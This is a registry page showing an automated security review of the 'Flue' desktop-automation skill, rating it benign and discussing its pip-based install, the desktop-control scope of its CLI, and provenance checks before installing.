Back to skill
Skillv1.0.2
ClawScan security
Flue — Desktop Software Bridge · ClawHub's context-aware review of the artifact, metadata, and declared behavior.
Scanner verdict
BenignApr 29, 2026, 12:43 PM
- Verdict
- benign
- Confidence
- high
- Model
- gpt-5-mini
- Summary
- The skill's requirements and runtime instructions are coherent with a desktop-automation bridge: it asks the agent to use a Python package (Flue) and to run its CLI, and it does not request unrelated credentials or access.
- Guidance
- This skill appears internally consistent, but it relies on installing the external 'flue' Python package. Before installing, verify the package/source: review the linked GitHub repo and the PyPI page, confirm the release/version, and inspect setup or entrypoint code for surprises. Only run 'pip install flue' with explicit human approval; prefer installing in an isolated virtualenv or sandbox. Be aware that once installed, the flue CLI can script and control local desktop apps (via COM, AppleScript, or in-app bridges) and therefore can read/modify documents — explicitly confirm any destructive or export actions with the human. If you need stronger assurance, ask the human to provide a checksum for the PyPI artifact or to review the package code (especially flue.setup, flue.cli, and adapter files) before allowing the agent to install or execute it.
Review Dimensions
- Purpose & Capability
- okThe name/description (desktop software bridge) matches the instructions: invoking a local Python package (flue) to run scripts inside host apps' automation runtimes. No unrelated environment variables, binaries, or config paths are requested.
- Instruction Scope
- noteThe SKILL.md explicitly instructs the agent to run 'pip install flue && flue setup' (with human permission) and to use the flue CLI (py -m flue.cli / python3 -m flue.cli). These commands are within the bridge's stated purpose, but they do cause network installs and will allow the installed package to inspect and control local apps (COM/AppleScript/in-app bridges). The instructions otherwise avoid accessing unrelated files or secrets and emphasize asking the human before destructive actions.
- Install Mechanism
- noteThere is no automatic install spec in the registry; the SKILL.md asks the human to run 'pip install flue' (PyPI) and links to a GitHub repo and PyPI page. Installing a package from PyPI is expected for this functionality but carries the usual risk that arbitrary code will be downloaded and executed during install or when the CLI runs. The SKILL.md does correctly point to the project's GitHub and PyPI entries so a user can inspect provenance before installing.
- Credentials
- okThe skill declares no required env vars, no credentials, and no config paths. That aligns with the described function. Note: runtime use of the installed package will interact with local desktop apps and their APIs (COM, AppleScript, in-app scripting), which is proportionate to a desktop-automation bridge but means the package gains ability to read/modify local documents and app state.
- Persistence & Privilege
- okThe skill is not marked 'always' and has default invocation settings. It does not request to persist or modify other skills or system-wide agent settings. Normal autonomous invocation is allowed (platform default) but not a combined red flag here.